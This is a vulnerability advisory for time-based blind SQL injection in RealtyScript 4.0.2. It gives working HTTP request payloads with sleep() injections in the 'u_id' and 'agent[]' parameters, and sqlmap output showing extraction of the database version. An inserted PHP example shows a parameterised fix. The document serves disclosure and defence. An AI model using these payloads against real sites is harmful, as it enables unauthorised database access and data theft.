RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]'
is not properly sanitised before being returned to the user or used in
SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
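As an added example, not code from the advisory or from RealtyScript: a PHP handler for the two inputs named above that validates each as a positive integer and binds it through a PDO prepared statement, including the per-element placeholders an array parameter such as agent[] needs in an IN list. Table and column names (users.u_id, agents.agent_id, agents.email) are assumptions, and an in-memory SQLite database stands in for MariaDB.

```php
<?php
// Added example (not RealtyScript code): hardened handling of the two inputs
// named in the advisory, GET u_id (users.php) and POST agent[] (mailer.php).
// Table and column names are assumptions; SQLite in memory stands in for MariaDB.

function positiveInt($value): int {
    // filter_var rejects "103 and (select ...)", arrays and null outright,
    // so no SQL is ever built from a non-numeric value.
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        throw new InvalidArgumentException('expected a positive integer');
    }
    return $n;
}

function removeUser(PDO $db, array $get): int {
    $uid = positiveInt($get['u_id'] ?? null);
    $stmt = $db->prepare('DELETE FROM users WHERE u_id = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

function agentEmails(PDO $db, array $post): array {
    $agents = $post['agent'] ?? null;
    if (!is_array($agents) || $agents === []) {
        throw new InvalidArgumentException('agent[] must be a non-empty array');
    }
    $ids = array_values(array_map('positiveInt', $agents));
    // One placeholder per element: the list is bound, never interpolated as text.
    $in = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare("SELECT email FROM agents WHERE agent_id IN ($in)");
    foreach ($ids as $i => $id) {
        $stmt->bindValue($i + 1, $id, PDO::PARAM_INT);   // positional params are 1-based
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed sample data for the demonstration.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE users (u_id INTEGER PRIMARY KEY)');
$db->exec('INSERT INTO users VALUES (103)');
$db->exec('CREATE TABLE agents (agent_id INTEGER PRIMARY KEY, email TEXT)');
$db->exec("INSERT INTO agents VALUES (101, 'a@example.test'), (102, 'b@example.test')");

echo removeUser($db, ['u_id' => '103']), " user(s) removed\n";
print_r(agentEmails($db, ['agent' => ['102', '101']]));
try {   // the advisory's own u_id payload never reaches the database
    removeUser($db, ['u_id' => '103 and (select * from (select(sleep(66)))a)--']);
} catch (InvalidArgumentException $e) { echo "rejected: {$e->getMessage()}\n"; }
```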
Tested on: Apache/2.4.6 (CentOS)
           PHP/5.4.16
           MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5270
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php
01.10.2015

--


(1)

GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)--& HTTP/1.1


(2)

POST /admin/mailer.php HTTP/1.1
Host: TARGET
Content-Length: 62
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://TARGET/admin/mailer.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5;

agent[]=102 and (select * from (select(sleep(67)))a)--&subject=test&message=t00t^^&submit_mailer=Send
======================================= sqlmap session output =======================================

$ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version"

[sqlmap banner, version {1.0-dev-04c1d43}] http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal.

[*] starting at 14:36:36

[14:36:36] [INFO] parsing HTTP request from 'request1.txt'
[14:36:36] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: u_id (GET)
Type: AND/OR time-based blind
Title: MySQL >=5.0.12 AND time-based blind (SELECT)
    Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM)
---
[14:36:36] [INFO] testing MySQL
[14:36:36][INFO] confirming MySQL
[14:36:36][INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >=5.0.0
[14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version'
[14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s)for DBMS delay responses (option '--time-sec')? [Y/n] Y
[14:37:03][INFO] adjusting time delay to 2 seconds due to good response times
5.5.41-MariaDB
SELECT @@version: '5.5.41-MariaDB'

[14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET'

[*] shutting down at 14:38:50

======================================= sqlmap session output =======================================